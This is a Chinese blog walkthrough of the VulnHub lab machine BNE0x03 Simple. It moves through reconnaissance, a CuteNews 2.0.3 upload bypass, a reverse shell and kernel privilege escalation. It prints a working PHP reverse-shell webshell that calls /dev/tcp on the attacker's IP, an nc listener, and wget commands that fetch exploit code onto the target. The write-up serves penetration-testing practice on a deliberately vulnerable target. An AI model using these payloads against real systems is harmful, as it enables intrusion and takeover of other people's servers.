[VulnHub靶机渗透] BNE0x03 Simple

???? 博主介绍

????‍???? 博主介绍:大家好,我是 hacker-routing ,很高兴认识大家~
✨主攻领域:【渗透领域】【应急响应】 【Java、PHP】 【VulnHub靶场复现】【面试分析】
????点赞➕评论➕收藏 == 养成习惯(一键三连)????
????欢迎关注????一起学习????一起讨论⭐️一起进步????文末有彩蛋
????作者水平有限,欢迎各位大佬指点,相互学习进步!


目录

一、前言

一、信息收集

1、主机探测

2、端口扫描

3、漏洞扫描

4、目录扫描

二、信息收集+渗透测试

1、信息收集

2、上传木马,反弹shell

三、内核提权


一、前言

靶机精讲之BNE0x03Simple,CuteCMS2.0.3公开漏洞利用,超贴心的利用文件,将标准化的挖洞和渗透过程,几乎以手把手的方式教给你。这个内核提权还是比较麻烦的,很多人可能看完WP以后觉得这个内核提权很简单,实际上是比较复杂的,因为这需要我们一个一个去尝试,在这个过程中肯定有人会觉得很无聊枯燥,但这就是实战中很常见的渗透测试方式!

一、信息收集

1、主机探测

利用arp嗅探,发现靶机的IP地址是192.168.103.162

┌──(root????kali)-[~]
└─# arp-scan -l

2、端口扫描

通过nmap端口扫描发现靶机只开放了80端口,那么毫无疑问我们的渗透重心肯定是web方向

┌──(root????kali)-[~]
└─# nmap -sS -A -p- 192.168.103.162

通过nmap扫描UDP端口,也没有什么有价值的信息

┌──(root????kali)-[~]
└─# nmap -sU --top-port 20 192.168.103.162

3、漏洞扫描

漏洞扫描结束,发现扫描结果显示可能存在csrf漏洞以及CVE-2007-6750漏洞,其中CVE-2007-6750我上网查找资料发现,这个漏洞是类似让你的web页面停止访问,对于我们这里渗透测试靶机提权没有什么帮助,感兴趣的师傅们可以尝试下。

┌──(root????kali)-[~]
└─# nmap --script=vuln -p80 192.168.103.162

--script=vuln是nmap自带的漏洞扫描参数

4、目录扫描

我们这里直接信息收集一把梭了,直接把目录也给一起扫描,然后再去分析80端口的web页面

扫描发现靶机的目录呦:/docs、/uploads、/skins、/core、/cdata,所以的目录都挖掘完了以后,都没有发现什么特别有价值的信息,但是/uploads目录,我觉得他没有那么简单,既然给了我们这个目录,我觉得后面应该用的上。

┌──(root????kali)-[~]
└─# gobuster dir -u http://192.168.103.162 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt

二、信息收集+渗透测试

1、信息收集

我们直接访问web页面,发现是个登录页面,但是在web页面上,可以看到CuteNews v.2.0.3,这个应该是CuteNews框架的版本号,像这种是很容易爆洞的,因为版本很低,我们可以上网进行查找。

发现exploit里面存在这个框架漏洞,那就好办了,我们直接查看下这个exp

发现这里有复现这个框架漏洞的步骤,还是很详细的

2、上传木马,反弹shell

我们先注册一个账号

然后再点击这个

我们就来到了exp里面说的可以上传木马的地方

然后上传一个.jpg的木马图片,然后利用burp抓包绕过改php后缀

木马如下,IP是kali的IP地址

<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/192.168.103.129/1234 0>&1'"); ?>

木马图片上传成功,我们再把后缀改成php木马文件的后缀,然后go一下,上传成功了

木马上传成功了,那么我们现在肯定得找木马的存放位置,然后利用kali进行反弹shell,有两个方法,其中第一个就是我们可以直接右击上传的那个图片,然后查看上传的位置

还有就是师傅们还记得开始我们扫描目录有个upload/目录,这个就是这个上传点的目录位置,发现我们上传的php木马文件。

我们先利用kali监听,然后再利用upload目录反弹shell,发现反弹shell成功了

┌──(root????kali)-[~]
└─# nc -lvnp 1234

三、内核提权

进入靶机,发现是个低权限的用户,那么我们就要进行提权了,这里我尝试了一般的提权方法,比如SUID提权和sudo -l 命令以及查看进程都没有发现可以提权的点。

这里我们想想,我们开始进入靶机,拿到shell是因为这个框架漏洞版本太低,那么我们进行提取操作的时候,是不是也可以利用这点呢,我直接uname -a 查看内核版本信息,好家伙还真是,这个内核版本确实低,可以被我们所利用,但是内核提权需要我们进行尝试,很不简单!

www-data@simple:/home/bull$ uname -a
uname -a
Linux simple 3.16.0-30-generic #40~14.04.1-Ubuntu SMP Thu Jan 15 17:45:15 UTC 2015 i686 i686 i686 GNU/Linux

我们进行searchspoit搜索对应版本的提取漏洞,现在就是只能靠自己一个一个去尝试了,后来我发现试了很多个都没有,但是我看靶机的内核有ubantu,我就尝试再匹配ubantu关键字。

searchsploit kernel 3.16.0-generic |grep "Privilege Escalation"

但是发现尝试了多个,也还是没有什么突破,后来看了红队大佬的笔记,说是查看ubantu 14.0的内核提权,那么我们这里就试试红队大佬的方法,因为内核提权就是这样的,有点靠运气的成分了,就得看我们检索的关键字是什么了,然后还得挨个去尝试!

┌──(root????kali)-[~/桌面]
└─# searchsploit kernel 3.16-generic |grep "Privilege Escalation" |grep Ubuntu

我们这里就按红队大佬的检索方法,查看ubantu14.0的内核提权方法,其中“Privilege Escalation”是权限提升的意思,就是检索可以从普通用户的权限提升至root权限。

┌──(root????kali)-[~/桌面/cms]
└─# searchsploit Ubuntu 14.04 |grep "Privilege Escalation"

那么接下来我们就是挨个进行尝试了,我们从第一个开始下载,这里靶机下载我们的提权脚本的时候可以利用PHP开启http服务

┌──(root????kali)-[~/桌面/cms]
└─# searchsploit -m 37088.c 

┌──(root????kali)-[~/桌面/cms]
└─# php -S 0:6666

我们可以cat查看这个脚本,我们这里直接把脚本命令改下,跟命令上的一样,方便我们后面执行

┌──(root????kali)-[~/桌面/cms]
└─# mv 37088.c apport-race.c

然后就是靶场利用wget命令下载脚本文件执行了,这里给大家提示下,我们下载执行脚本之前,最好是在/tmp目录下,因为权限的问题。

wget http://192.168.103.129:6666/apport-race.c

我们发现执行完命令以后,成功提权并且拿到了flag了。

# cat flag.txt
U wyn teh Interwebs!!1eleven11!!1!
Hack the planet!
上一篇:数据库选型-Mysql和Mongodb对比


下一篇:Sentinel(熔断规则)